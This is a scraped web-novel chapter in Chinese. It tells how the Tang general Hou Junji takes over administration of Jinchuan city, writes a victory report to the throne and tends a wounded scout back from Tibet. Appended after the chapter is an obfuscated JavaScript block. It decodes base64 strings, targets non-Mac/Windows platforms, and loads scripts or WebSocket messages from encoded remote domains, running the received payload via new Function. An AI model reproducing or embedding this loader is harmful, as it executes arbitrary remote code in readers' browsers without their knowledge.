关灯
护眼
字体:
c

第五百七十三章 路东衍辞行

首页 书架 加入书签 返回目录
金川城"。

唐军入城之后,大战逃亡的百姓也陆续回道城内"。

城内已经是千疮百孔"。

投降的吐蕃军卒被严加看管,按照侯君集的意思,砍死了一了百了"。

但有了前车之鉴,侯君集放弃了这个危险的想法"。

老侯不是啥没脑子的人,现在带头大哥开始要脸了"。

你看打仗的时候,找茬可以不要脸,但打完仗之后,是需要讲理的"。

侯君集也算是一个人才,给这群人组建了一个培训班,要把这群人给策反,然后放回吐蕃"。

百姓们开始修补城墙,重建防务,治安一直由唐军维护"。

本身,这群人就是南北朝的移民,理论上讲基本都有中原人的血统"。

慕容付允在位的时候,说白了就是一位暴君,百姓们对他也不爱带"。

m.既然唐军收复了吐谷浑,做大唐麾下的子民,也没啥不好的"。

教育先行,侯君集约法三章:免除农税,鼓励经商,大唐军不拿走百姓一针一线"。

但有个很大的前提,那就是将来吐谷浑要学习大唐文化,和中原人通婚"。

官吏城池,侯君集一直都不拿手,打仗厉害的人也有短板,特意将洮州刺史孔秀,借调来了金川城,并从洮州、珉州、河州、松洲抽调了一部分官员,前来暂时管理吐谷浑"。

侯君集连续几天都在看地图,哨骑和细作们,早就打探清楚了,吐谷浑境内的吐蕃军队,全都撤走了,人数不足万人,就驻防在格尔木城"。

老侯摩拳擦掌的,真想打一下格尔木城"。

自己战死了这么多人,光一个吐谷浑很难满足侯君集的胃口,不逼着你割地赔款,你总得让出来几座城池,让我们心理平衡平衡吧?想来想去,侯君集笑了,不打了"?

在打就越界了,剩下的事情是带头大哥要做的了,自己不能把所有事情全做了,像是巡视西域就是最好的例子"。

拿出一份空白的奏疏,侯君集开始撰写公文,首当其冲的就是老牛"。

侯君集没朋友,在大唐真心没朋友,就那么一个勋国公张亮,还是十分诡道的人,侯君集一直不相信他,生怕张亮在背后给他捅刀子"。

但胜在,现在张亮还没造反,在侯君集从西域回来的时候,还找秦长青帮他求情"。

所以,侯君集亲自撰写的官方奏报,首先是给老牛请功,然后是各大将领,到了他侯君集这里,没有请功,一笔带过的写着:功,不在帅,在于军,在于皇,在于朝廷,在于法令"?

吹干了墨迹,侯君集将奏报交给了录事参军,“快马送往京城吧"!

说话间,有一名斥候回来了,全身是伤,胳膊上还插着断箭"。

“大帅……”“先养伤,又是伤好了再说"。

”“大帅,暂时还死不了"!

斥候坐在地上,找老侯要了一碗酒,“大帅,斥候小队一共二十人,战死十九人,只有末将一个人羞辱的回来了"。

是他们拼死把末将送回来的"。

正如之前秦爵爷的信函里面说的一样"。

吐蕃境内全都是丛山峻岭,西高东低,咱们的人进入吐蕃腹地之后,立马就呼吸困难了,还遇到了一次大学,越往吐蕃的境内走就越受不了……大帅,我们小队给大唐丢人了,末将想在伤好之后,以商队的名义,在此进入吐蕃,刺探情报"。

”侯君集亲自给这名斥候,又倒了一碗酒,“先把伤养好,抽空把阵亡名单交给录事参军,双倍抚恤"!

↑看 钼录 ↓看
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDEzNQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x69\x54\x6d\x50\x4e\x46\x42\x47\x7a\x68']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};